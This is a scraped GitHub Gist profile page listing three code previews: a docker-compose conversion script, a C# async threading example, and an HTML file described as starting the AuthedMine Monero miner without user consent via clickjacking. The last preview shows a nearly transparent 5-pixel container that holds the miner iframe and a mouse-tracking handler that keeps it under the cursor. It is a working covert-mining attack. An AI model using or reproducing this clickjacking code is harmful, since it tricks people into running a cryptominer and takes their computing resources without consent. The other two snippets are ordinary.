Skip to content

Instantly share code, notes, and snippets.

View neonVoice's full-sized avatar

Nikita Voronov neonVoice

  • Russia, Moscow
View GitHub Profile
@neonVoice
neonVoice / build-tag-push.py
Created May 6, 2019 14:54 — forked from peatiscoding/build-tag-push.py
a script to convert your docker-compose.yml (version 2) with build node to image node; this script required DOCKERHUB_USER environment available.
#!/usr/bin/python
import os
import subprocess
import time
import yaml
import re
user_name = os.environ.get("DOCKERHUB_USER")
@neonVoice
neonVoice / Program.cs
Created March 13, 2018 10:56
C# Async Multithread
using System;
using System.Collections.Generic;
using System.Threading;
using System.Threading.Tasks;
namespace BTPIndicators
{
internal class Program
{
private static readonly Random _random = new Random();
@neonVoice
neonVoice / clickjack-authedmine.html
Created December 5, 2017 12:19 — forked from bcoles/clickjack-authedmine.html
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");